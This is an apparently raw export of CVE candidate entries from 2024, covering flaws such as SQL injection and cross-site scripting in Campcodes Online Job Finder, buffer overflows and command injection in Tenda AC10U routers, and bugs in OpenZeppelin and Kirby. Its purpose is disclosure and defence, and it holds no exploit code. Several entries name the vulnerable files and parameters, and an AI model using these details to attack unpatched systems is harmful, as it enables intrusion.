CVE    2024    27094    Candidate    OpenZeppelin Contracts is a library for secure smart contract development. The `Base64.encode` function encodes a `bytes` input by iterating over it in chunks of 3 bytes. When this input is not a multiple of 3, the last iteration may read parts of the memory that are beyond the input buffer. The vulnerability is fixed in 5.0.2 and 4.9.6.    MISC:https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable/commit/2d081f24cac1a867f6f73d512f2022e1fa987854   |   URL:https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable/commit/2d081f24cac1a867f6f73d512f2022e1fa987854   |   MISC:https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable/commit/723f8cab09cdae1aca9ec9cc1cfa040c2d4b06c1   |   URL:https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable/commit/723f8cab09cdae1aca9ec9cc1cfa040c2d4b06c1   |   MISC:https://github.com/OpenZeppelin/openzeppelin-contracts/commit/92224533b1263772b0774eec3134e132a3d7b2a6   |   URL:https://github.com/OpenZeppelin/openzeppelin-contracts/commit/92224533b1263772b0774eec3134e132a3d7b2a6   |   MISC:https://github.com/OpenZeppelin/openzeppelin-contracts/commit/a6286d0fded8771b3a645e5813e51993c490399c   |   URL:https://github.com/OpenZeppelin/openzeppelin-contracts/commit/a6286d0fded8771b3a645e5813e51993c490399c   |   MISC:https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-9vx6-7xxf-x967   |   URL:https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-9vx6-7xxf-x967    Assigned (20240219)
CVE    2024    27093    Candidate    Minder is a Software Supply Chain Security Platform. In version 0.0.31 and earlier, it is possible for an attacker to register a repository with an invalid or differing upstream ID, which causes Minder to report the repository as registered, but not remediate any future changes which conflict with policy (because the webhooks for the repo do not match any known repository in the database). When attempting to register a repo with a different repo ID, the registered provider must have admin on the named repo, or a 404 error will result. Similarly, if the stored provider token does not have repo access, then the remediations will not apply successfully. Lastly, it appears that reconciliation actions do not execute against repos with this type of mismatch. This appears to primarily be a potential denial-of-service vulnerability. This vulnerability is patched in version 0.20240226.1425+ref.53868a8.    MISC:https://github.com/stacklok/minder/commit/53868a878e93f29c43437f96dbc990b548e48d1d   |   URL:https://github.com/stacklok/minder/commit/53868a878e93f29c43437f96dbc990b548e48d1d   |   MISC:https://github.com/stacklok/minder/security/advisories/GHSA-q6h8-4j2v-pjg4   |   URL:https://github.com/stacklok/minder/security/advisories/GHSA-q6h8-4j2v-pjg4    Assigned (20240219)
CVE    2024    27092    Candidate    Hoppscotch is an API development ecosystem. Due to a lack of validation for fields like Label (Edit Team) - TeamName, bad actors can send emails with spoofed content as Hoppscotch. Part of the payload (an external link) is presented in clickable form, which makes it easier for malicious actors to achieve their goals. This issue is fixed in 2023.12.6.    MISC:https://github.com/hoppscotch/hoppscotch/blob/main/packages/hoppscotch-backend/src/team-invitation/team-invitation.service.ts#L153   |   URL:https://github.com/hoppscotch/hoppscotch/blob/main/packages/hoppscotch-backend/src/team-invitation/team-invitation.service.ts#L153   |   MISC:https://github.com/hoppscotch/hoppscotch/commit/6827e97ec583b2534cdc1c2f33fa44973a0c2bf5   |   URL:https://github.com/hoppscotch/hoppscotch/commit/6827e97ec583b2534cdc1c2f33fa44973a0c2bf5   |   MISC:https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-8r6h-8r68-q3pp   |   URL:https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-8r6h-8r68-q3pp    Assigned (20240219)
CVE    2024    2709    Candidate    A vulnerability was found in Tenda AC10U 15.03.06.49. It has been classified as critical. Affected is the function fromSetRouteStatic of the file /goform/SetStaticRouteCfg. The manipulation of the argument list leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257460. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257460 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257460   |   MISC:VDB-257460 | Tenda AC10U SetStaticRouteCfg fromSetRouteStatic stack-based overflow   |   URL:https://vuldb.com/?id.257460   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/fromSetRouteStatic.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/fromSetRouteStatic.md    Assigned (20240320)
CVE    2024    27089    Candidate    ** REJECT ** This candidate was withdrawn by its CNA. Further investigation showed that it was not in the allowed scope of that CNA's CVE ID assignments.        Assigned (20240219)
CVE    2024    27088    Candidate    es5-ext contains ECMAScript 5 extensions. Passing functions with very long names or complex default argument names into `function#copy` or `function#toStringTokens` may cause the script to stall. The vulnerability is patched in v0.10.63.    MISC:https://github.com/medikoo/es5-ext/commit/3551cdd7b2db08b1632841f819d008757d28e8e2   |   URL:https://github.com/medikoo/es5-ext/commit/3551cdd7b2db08b1632841f819d008757d28e8e2   |   MISC:https://github.com/medikoo/es5-ext/commit/a52e95736690ad1d465ebcd9791d54570e294602   |   URL:https://github.com/medikoo/es5-ext/commit/a52e95736690ad1d465ebcd9791d54570e294602   |   MISC:https://github.com/medikoo/es5-ext/issues/201   |   URL:https://github.com/medikoo/es5-ext/issues/201   |   MISC:https://github.com/medikoo/es5-ext/security/advisories/GHSA-4gmj-3p3h-gm8h   |   URL:https://github.com/medikoo/es5-ext/security/advisories/GHSA-4gmj-3p3h-gm8h    Assigned (20240219)
CVE    2024    27087    Candidate    Kirby is a content management system. The new link field introduced in Kirby 4 allows several different link types that each validate the entered link to the relevant URL format. It also includes a "Custom" link type for advanced use cases that don't fit any of the pre-defined link formats. As the "Custom" link type is meant to be flexible, it also allows the javascript: URL scheme. In some use cases this can be intended, but it can also be misused by attackers to execute arbitrary JavaScript code when a user or visitor clicks on a link that is generated from the contents of the link field. This vulnerability is patched in 4.1.1.    MISC:https://github.com/getkirby/kirby/commit/cda3dd9a15228d35e62ff86cfa87a67e7c687437   |   URL:https://github.com/getkirby/kirby/commit/cda3dd9a15228d35e62ff86cfa87a67e7c687437   |   MISC:https://github.com/getkirby/kirby/security/advisories/GHSA-63h4-w25c-3qv4   |   URL:https://github.com/getkirby/kirby/security/advisories/GHSA-63h4-w25c-3qv4    Assigned (20240219)
CVE    2024    27085    Candidate    Discourse is an open source platform for community discussion. In affected versions users that are allowed to invite others can inject arbitrarily large data in parameters used in the invite route. The problem has been patched in the latest version of Discourse. Users are advised to upgrade. Users unable to upgrade should disable invites or restrict access to them using the `invite allowed groups` site setting.    MISC:https://github.com/discourse/discourse/commit/62ea382247c1f87361d186392c45ca74c83be295   |   URL:https://github.com/discourse/discourse/commit/62ea382247c1f87361d186392c45ca74c83be295   |   MISC:https://github.com/discourse/discourse/security/advisories/GHSA-cvp5-h7p8-mjj6   |   URL:https://github.com/discourse/discourse/security/advisories/GHSA-cvp5-h7p8-mjj6    Assigned (20240219)
CVE    2024    27084    Candidate    ** REJECT ** This CVE is a duplicate of CVE-2024-1631.        Assigned (20240219)
CVE    2024    27083    Candidate    Flask-AppBuilder is an application development framework, built on top of Flask. A Cross-Site Scripting (XSS) vulnerability has been discovered on the OAuth login page. An attacker could trick a user into following a specially crafted URL to the OAuth login page. This URL could inject malicious JavaScript code that would be executed in the user's browser. This issue was introduced in 4.1.4 and patched in 4.2.1.    MISC:https://github.com/dpgaspar/Flask-AppBuilder/commit/3d17741886e4b3c384d0570de69689e4117aa812   |   URL:https://github.com/dpgaspar/Flask-AppBuilder/commit/3d17741886e4b3c384d0570de69689e4117aa812   |   MISC:https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-fqxj-46wg-9v84   |   URL:https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-fqxj-46wg-9v84    Assigned (20240219)
CVE    2024    27081    Candidate    ESPHome is a system to control your ESP8266/ESP32. A security misconfiguration in the edit configuration file API in the dashboard component of ESPHome version 2023.12.9 (command line installation) allows authenticated remote attackers to read and write arbitrary files under the configuration directory rendering remote code execution possible. This vulnerability is patched in 2024.2.1.    MISC:https://github.com/esphome/esphome/commit/d814ed1d4adc71fde47c4df41215bee449884513   |   URL:https://github.com/esphome/esphome/commit/d814ed1d4adc71fde47c4df41215bee449884513   |   MISC:https://github.com/esphome/esphome/security/advisories/GHSA-8p25-3q46-8q2p   |   URL:https://github.com/esphome/esphome/security/advisories/GHSA-8p25-3q46-8q2p    Assigned (20240219)
CVE    2024    2708    Candidate    A vulnerability was found in Tenda AC10U 15.03.06.49 and classified as critical. This issue affects the function formexeCommand of the file /goform/execCommand. The manipulation of the argument cmdinput leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257459. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257459 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257459   |   MISC:VDB-257459 | Tenda AC10U execCommand formexeCommand stack-based overflow   |   URL:https://vuldb.com/?id.257459   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formexeCommand.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formexeCommand.md    Assigned (20240320)
CVE    2024    2707    Candidate    A vulnerability has been found in Tenda AC10U 15.03.06.49 and classified as critical. This vulnerability affects the function formWriteFacMac of the file /goform/WriteFacMac. The manipulation of the argument mac leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257458 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257458 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257458   |   MISC:VDB-257458 | Tenda AC10U WriteFacMac formWriteFacMac os command injection   |   URL:https://vuldb.com/?id.257458   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formWriteFacMac.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formWriteFacMac.md    Assigned (20240320)
CVE    2024    2706    Candidate    A vulnerability, which was classified as critical, was found in Tenda AC10U 15.03.06.49. This affects the function formWifiWpsStart of the file /goform/WifiWpsStart. The manipulation of the argument index leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257457 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257457 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257457   |   MISC:VDB-257457 | Tenda AC10U WifiWpsStart formWifiWpsStart stack-based overflow   |   URL:https://vuldb.com/?id.257457   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formWifiWpsStart.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formWifiWpsStart.md    Assigned (20240320)
CVE    2024    2705    Candidate    A vulnerability, which was classified as critical, has been found in Tenda AC10U 1.0/15.03.06.49. Affected by this issue is the function formSetQosBand of the file /goform/SetNetControlList. The manipulation of the argument list leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257456. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257456 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257456   |   MISC:VDB-257456 | Tenda AC10U SetNetControlList formSetQosBand stack-based overflow   |   URL:https://vuldb.com/?id.257456   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formSetQosBand.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formSetQosBand.md    Assigned (20240320)
CVE    2024    2704    Candidate    A vulnerability classified as critical was found in Tenda AC10U 15.03.06.49. Affected by this vulnerability is the function formSetFirewallCfg of the file /goform/SetFirewallCfg. The manipulation of the argument firewallEn leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257455. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257455 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257455   |   MISC:VDB-257455 | Tenda AC10U SetFirewallCfg formSetFirewallCfg stack-based overflow   |   URL:https://vuldb.com/?id.257455   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formSetFirewallCfg.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formSetFirewallCfg.md    Assigned (20240320)
CVE    2024    2703    Candidate    A vulnerability classified as critical has been found in Tenda AC10U 15.03.06.49. Affected is the function formSetDeviceName of the file /goform/SetOnlineDevName. The manipulation of the argument mac leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257454 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257454 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257454   |   MISC:VDB-257454 | Tenda AC10U SetOnlineDevName formSetDeviceName stack-based overflow   |   URL:https://vuldb.com/?id.257454   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formSetDeviceName_mac.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC10U/v1.V15.03.06.49/more/formSetDeviceName_mac.md    Assigned (20240320)
CVE    2024    2702    Candidate    Missing Authorization vulnerability in Olive Themes Olive One Click Demo Import allows importing settings and data, ultimately leading to XSS. This issue affects Olive One Click Demo Import: from n/a through 1.1.1.    MISC:https://patchstack.com/database/vulnerability/olive-one-click-demo-import/wordpress-olive-one-click-demo-import-plugin-1-1-1-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/olive-one-click-demo-import/wordpress-olive-one-click-demo-import-plugin-1-1-1-broken-access-control-vulnerability?_s_id=cve    Assigned (20240320)
CVE    2024    2690    Candidate    A vulnerability was found in SourceCodester Online Discussion Forum Site 1.0. It has been classified as critical. Affected is an unknown function of the file /uupdate.php. The manipulation of the argument ima leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257388.    MISC:VDB-257388 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257388   |   MISC:VDB-257388 | SourceCodester Online Discussion Forum Site uupdate.php unrestricted upload   |   URL:https://vuldb.com/?id.257388   |   MISC:https://github.com/wkeyi0x1/vul-report/issues/2   |   URL:https://github.com/wkeyi0x1/vul-report/issues/2    Assigned (20240319)
CVE    2024    2688    Candidate    The EmbedPress – Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the EmbedPress document widget in all versions up to, and including, 3.9.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3055856%40embedpress&new=3055856%40embedpress&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3055856%40embedpress&new=3055856%40embedpress&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c5b67927-5993-4e21-af52-8ebe7fee48ab?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c5b67927-5993-4e21-af52-8ebe7fee48ab?source=cve    Assigned (20240319)
CVE    2024    2687    Candidate    A vulnerability was found in Campcodes Online Job Finder System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/applicants/index.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257387.    MISC:VDB-257387 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257387   |   MISC:VDB-257387 | Campcodes Online Job Finder System index.php sql injection   |   URL:https://vuldb.com/?id.257387   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2011.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2011.pdf    Assigned (20240319)
CVE    2024    2686    Candidate    A vulnerability has been found in Campcodes Online Job Finder System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/applicants/controller.php. The manipulation of the argument JOBREGID leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257386 is the identifier assigned to this vulnerability.    MISC:VDB-257386 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257386   |   MISC:VDB-257386 | Campcodes Online Job Finder System controller.php cross site scripting   |   URL:https://vuldb.com/?id.257386   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2021.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2021.pdf    Assigned (20240319)
CVE    2024    2685    Candidate    A vulnerability, which was classified as problematic, was found in Campcodes Online Job Finder System 1.0. This affects an unknown part of the file /admin/applicants/index.php. The manipulation of the argument view leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257385 was assigned to this vulnerability.    MISC:VDB-257385 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257385   |   MISC:VDB-257385 | Campcodes Online Job Finder System index.php cross site scripting   |   URL:https://vuldb.com/?id.257385   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2020.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2020.pdf    Assigned (20240319)
CVE    2024    2684    Candidate    A vulnerability, which was classified as problematic, has been found in Campcodes Online Job Finder System 1.0. Affected by this issue is some unknown functionality of the file /admin/category/index.php. The manipulation of the argument view leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257384.    MISC:VDB-257384 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257384   |   MISC:VDB-257384 | Campcodes Online Job Finder System index.php cross site scripting   |   URL:https://vuldb.com/?id.257384   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%209.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%209.pdf    Assigned (20240319)
CVE    2024    2683    Candidate    A vulnerability classified as problematic was found in Campcodes Online Job Finder System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/company/index.php. The manipulation of the argument view leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257383.    MISC:VDB-257383 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257383   |   MISC:VDB-257383 | Campcodes Online Job Finder System index.php cross site scripting   |   URL:https://vuldb.com/?id.257383   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2018.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2018.pdf    Assigned (20240319)
CVE    2024    2682    Candidate    A vulnerability classified as problematic has been found in Campcodes Online Job Finder System 1.0. Affected is an unknown function of the file /admin/employee/controller.php. The manipulation of the argument EMPLOYEEID leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257382 is the identifier assigned to this vulnerability.    MISC:VDB-257382 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257382   |   MISC:VDB-257382 | Campcodes Online Job Finder System controller.php cross site scripting   |   URL:https://vuldb.com/?id.257382   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2017.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2017.pdf    Assigned (20240319)
CVE    2024    2681    Candidate    A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/employee/index.php. The manipulation of the argument view leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257381 was assigned to this vulnerability.    MISC:VDB-257381 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257381   |   MISC:VDB-257381 | Campcodes Online Job Finder System index.php cross site scripting   |   URL:https://vuldb.com/?id.257381   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2016.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2016.pdf    Assigned (20240319)
CVE    2024    2680    Candidate    A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/user/index.php. The manipulation of the argument view leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257380.    MISC:VDB-257380 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257380   |   MISC:VDB-257380 | Campcodes Online Job Finder System index.php cross site scripting   |   URL:https://vuldb.com/?id.257380   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2015.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2015.pdf    Assigned (20240319)
CVE    2024    2679    Candidate    A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/vacancy/index.php. The manipulation of the argument view leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257379.    MISC:VDB-257379 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257379   |   MISC:VDB-257379 | Campcodes Online Job Finder System index.php cross site scripting   |   URL:https://vuldb.com/?id.257379   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2014.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2014.pdf    Assigned (20240319)
CVE    2024    2678    Candidate    A vulnerability was found in Campcodes Online Job Finder System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/applicants/controller.php. The manipulation of the argument JOBREGID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257378 is the identifier assigned to this vulnerability.    MISC:VDB-257378 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257378   |   MISC:VDB-257378 | Campcodes Online Job Finder System controller.php sql injection   |   URL:https://vuldb.com/?id.257378   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2013.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2013.pdf    Assigned (20240319)
CVE    2024    2677    Candidate    A vulnerability has been found in Campcodes Online Job Finder System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/category/controller.php. The manipulation of the argument CATEGORYID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257377 was assigned to this vulnerability.    MISC:VDB-257377 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257377   |   MISC:VDB-257377 | Campcodes Online Job Finder System controller.php sql injection   |   URL:https://vuldb.com/?id.257377   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2012.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2012.pdf    Assigned (20240319)
CVE    2024    2676    Candidate    A vulnerability, which was classified as critical, was found in Campcodes Online Job Finder System 1.0. Affected is an unknown function of the file /admin/company/controller.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257376.    MISC:VDB-257376 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257376   |   MISC:VDB-257376 | Campcodes Online Job Finder System controller.php sql injection   |   URL:https://vuldb.com/?id.257376   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%209.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%209.pdf    Assigned (20240319)
CVE    2024    2675    Candidate    A vulnerability, which was classified as critical, has been found in Campcodes Online Job Finder System 1.0. This issue affects some unknown processing of the file /admin/company/index.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257375.    MISC:VDB-257375 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257375   |   MISC:VDB-257375 | Campcodes Online Job Finder System index.php sql injection   |   URL:https://vuldb.com/?id.257375   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%208.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%208.pdf    Assigned (20240319)
CVE    2024    2674    Candidate    A vulnerability classified as critical was found in Campcodes Online Job Finder System 1.0. This vulnerability affects unknown code of the file /admin/employee/index.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257374 is the identifier assigned to this vulnerability.    MISC:VDB-257374 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257374   |   MISC:VDB-257374 | Campcodes Online Job Finder System index.php sql injection   |   URL:https://vuldb.com/?id.257374   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%207.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%207.pdf    Assigned (20240319)
CVE    2024    2673    Candidate    A vulnerability classified as critical has been found in Campcodes Online Job Finder System 1.0. This affects an unknown part of the file /admin/login.php. The manipulation of the argument user_email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257373 was assigned to this vulnerability.    MISC:VDB-257373 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257373   |   MISC:VDB-257373 | Campcodes Online Job Finder System login.php sql injection   |   URL:https://vuldb.com/?id.257373   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%206.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%206.pdf    Assigned (20240319)
CVE    2024    2672    Candidate    A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/user/controller.php. The manipulation of the argument UESRID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257372.    MISC:VDB-257372 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257372   |   MISC:VDB-257372 | Campcodes Online Job Finder System controller.php sql injection   |   URL:https://vuldb.com/?id.257372   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%205.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%205.pdf    Assigned (20240319)
